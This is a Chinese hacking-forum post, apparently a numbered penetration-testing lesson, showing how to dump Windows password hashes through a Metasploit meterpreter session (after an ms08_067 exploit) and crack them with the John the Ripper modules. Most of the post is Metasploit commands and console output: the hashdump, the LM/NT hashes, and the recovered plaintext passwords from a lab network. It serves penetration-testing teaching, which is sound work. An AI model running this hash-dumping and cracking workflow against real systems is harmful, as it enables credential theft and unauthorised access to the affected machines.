切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
197 暴力破解 : John 4[复制链接]
发表于 2012-10-3 20:45:35 | 显示全部楼层 |!read_mode!
Metasploit调用john的破解模块
  1. use auxiliary/analyze/jtr_aix
  2. use auxiliary/analyze/jtr_crack_fast
  3. use auxiliary/analyze/jtr_linux
  4. use auxiliary/analyze/jtr_mssql_fast
  5. use auxiliary/analyze/jtr_mysql_fast
  6. use auxiliary/analyze/jtr_oracle_fast
  7. use auxiliary/analyze/jtr_unshadow
  8. use auxiliary/analyze/postgres_md5_crack
复制代码

我们添加一个记录
  1. msf > creds -a 1.1.1.1 -p 3306 -u root -P AAB3E285149C0135D51A520E1940DD3263DC008C
  2. [*] Time: 2012-07-22 22:50:04 UTC Credential: host=1.1.1.1 port=3306 proto=tcp sname= type=password user=root pass=AAB3E285149C0135D51A520E1940DD3263DC008C active=true
  3. msf >
复制代码

查看一下
  1. msf > creds

  2. Credentials
  3. ===========

  4. host     port  user  pass                                      type      active?
  5. ----     ----  ----  ----                                      ----      -------
  6. 1.1.1.1  3306  root  AAB3E285149C0135D51A520E1940DD3263DC008C  password  true

  7. [*] Found 1 credential.
  8. msf >
复制代码

然后就能进入破解模块破解 默认密码位置
  1. root@Dis9Team:/pen/msf3/data/john/wordlists# pwd
  2. /pen/msf3/data/john/wordlists
复制代码

在渗透测试中我们可以用一些模块获得 例如HASHDUMP,获得的密码存在数据库中,我们可以直接破解 例如:191课程:
调用牛B的密码破解工具 john ,不需要你安装,他已经有了 字典: /msf3/data/john/wordlists/password.lst
  1. msf  post(hashdump) > sessions

  2. Active sessions
  3. ===============

  4.   Id  Type                   Information                                      Connection
  5.   --  ----                   -----------                                      ----------
  6.   1   meterpreter x86/win32  XP-201112162005\Administrator @ XP-201112162005  192.1.1.100:1337 -> 192.1.1.2:1042

  7. msf  exploit(ms08_067_netapi) > use post/windows/gather/hashdump
  8. msf  post(hashdump) > set SESSION 1
  9. SESSION => 1
  10. msf  post(hashdump) > run

  11. [*] Obtaining the boot key...
  12. [*] Calculating the hboot key using SYSKEY 4763cb912d3684138823ad24aa8176bd...
  13. [*] Obtaining the user list and keys...
  14. [*] Decrypting user keys...
  15. [*] Dumping password hashes...

  16. Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  17. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  18. HelpAssistant:1000:554256a059570d709ea8a2e2ebe7be5f:7e72d7a08835c7f52a6875307c5b758a:::
  19. SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:3929fd5afe9bb4209f171f8d749767f5:::
  20. dis9team:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  21. hack:1004:9d82cdff56b35758aad3b435b51404ee:f39934a2710a469b3c63ce1487794514:::
  22. helen:1005:58bd64a8be241d6eaad3b435b51404ee:595d296e5b95cb98e7703ade701e3068:::
  23. passwd:1006:91c7ae7122196b5eaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::
  24. test1:1007:e88d94d6ebd10fc7aad3b435b51404ee:aacd12d27c87cac8fc0b8538aed6f058:::
  25. fuckyou:1008:0a174c1272fcbcf7aad3b435b51404ee:1c4ecc8938fb93812779077127e97662:::

  26. [*] Post module execution completed
复制代码

进入破解模块破解
  1. msf  post(hashdump) > use auxiliary/analyze/jtr_crack_fast
  2. msf  auxiliary(jtr_crack_fast) > run

  3. [*] Seeded the password database with 11 words...
  4. guesses: 6  time: 0:00:00:05 DONE (Wed Dec 21 19:08:04 2011)  c/s: 7449K  trying: WIG1900 - ZZZ1900
  5. Warning: passwords printed above might be partial and not be all those cracked
  6. Use the "--show" option to display all of the cracked passwords reliably
  7. [*] Output: Loaded 9 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
  8. [*] Output: 123456           (cred_5)
  9. [*] Output: HACK             (cred_10)
  10. [*] Output: HELEN            (cred_11)
  11. [*] Output: PASSWD           (cred_12)
  12. [*] Output: TEST1            (cred_13)
  13. [*] Output: FUCKYOU          (cred_14)
  14. Warning: mixed-case charset, but the current hash type is case-insensitive;
  15. some candidate passwords may be unnecessarily tried more than once.
  16. guesses: 1  time: 0:00:00:06 DONE (Wed Dec 21 19:08:10 2011)  c/s: 25367K  trying: ||V} - |||}
  17. Warning: passwords printed above might be partial and not be all those cracked
  18. Use the "--show" option to display all of the cracked passwords reliably
  19. [*] Output: Loaded 9 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
  20. [*] Output: Remaining 3 password hashes with no different salts
  21. [*] Output: (cred_9)
  22. guesses: 0  time: 0:00:00:00 DONE (Wed Dec 21 19:08:11 2011)  c/s: 1388K  trying: 89093 - 89092
  23. [*] Output: Loaded 9 password hashes with no different salts (LM DES [128/128 BS SSE2-16])
  24. [*] Output: Remaining 2 password hashes with no different salts
  25. [*] cred_14:FUCKYOU:0a174c1272fcbcf7aad3b435b51404ee:1c4ecc8938fb93812779077127e97662:::

  26. [*] cred_13:TEST1:e88d94d6ebd10fc7aad3b435b51404ee:aacd12d27c87cac8fc0b8538aed6f058:::

  27. [*] cred_12:PASSWD:91c7ae7122196b5eaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::

  28. [*] cred_11:HELEN:58bd64a8be241d6eaad3b435b51404ee:595d296e5b95cb98e7703ade701e3068:::

  29. [*] cred_10:HACK:9d82cdff56b35758aad3b435b51404ee:f39934a2710a469b3c63ce1487794514:::

  30. [*] cred_9::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

  31. [*] cred_8::aad3b435b51404eeaad3b435b51404ee:3929fd5afe9bb4209f171f8d749767f5:::

  32. [*] cred_6::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

  33. [*] cred_5:123456:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

  34. [*]

  35. [*] 9 password hashes cracked, 2 left

  36. guesses: 6  time: 0:00:00:13 DONE (Wed Dec 21 19:08:24 2011)  c/s: 15554K  trying: hack1900
  37. Warning: passwords printed above might not be all those cracked
  38. Use the "--show" option to display all of the cracked passwords reliably
  39. [*] Output: Loaded 9 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
  40. [*] Output: fuckyou          (cred_14)
  41. [*] Output: test1            (cred_13)
  42. [*] Output: passwd           (cred_12)
  43. [*] Output: helen            (cred_11)
  44. [*] Output: hack             (cred_10)
  45. [*] Output: 123456           (cred_5)
  46. guesses: 1  time: 0:00:00:05 DONE (Wed Dec 21 19:08:29 2011)  c/s: 29933K  trying: |||}
  47. Warning: passwords printed above might not be all those cracked
  48. Use the "--show" option to display all of the cracked passwords reliably
  49. [*] Output: Loaded 9 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
  50. [*] Output: Remaining 3 password hashes with no different salts
  51. [*] Output: (cred_9)
  52. guesses: 0  time: 0:00:00:00 DONE (Wed Dec 21 19:08:30 2011)  c/s: 1481K  trying: 89093 - 89092
  53. [*] Output: Loaded 9 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
  54. [*] Output: Remaining 2 password hashes with no different salts
  55. [*] cred_14:fuckyou:0a174c1272fcbcf7aad3b435b51404ee:1c4ecc8938fb93812779077127e97662:::

  56. [*] cred_13:test1:e88d94d6ebd10fc7aad3b435b51404ee:aacd12d27c87cac8fc0b8538aed6f058:::

  57. [*] cred_12:passwd:91c7ae7122196b5eaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::

  58. [*] cred_11:helen:58bd64a8be241d6eaad3b435b51404ee:595d296e5b95cb98e7703ade701e3068:::

  59. [*] cred_10:hack:9d82cdff56b35758aad3b435b51404ee:f39934a2710a469b3c63ce1487794514:::

  60. [*] cred_9::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

  61. [*] cred_6::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

  62. [*] cred_5:123456:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

  63. [*]

  64. [*] 8 password hashes cracked, 2 left

  65. [+] Cracked: fuckyou:fuckyou (192.1.1.4:445)
  66. [+] Cracked: test1:test1 (192.1.1.4:445)
  67. [+] Cracked: passwd:passwd (192.1.1.4:445)
  68. [+] Cracked: helen:helen (192.1.1.4:445)
  69. [+] Cracked: hack:hack (192.1.1.4:445)
  70. [+] Cracked: administrator:123456 (192.1.1.4:445)
  71. [+] Cracked: dis9team: (192.1.1.4:445)
  72. [+] Cracked: guest: (192.1.1.4:445)
  73. [*] Auxiliary module execution completed
  74. msf  auxiliary(jtr_crack_fast) >
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-20 19:29

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部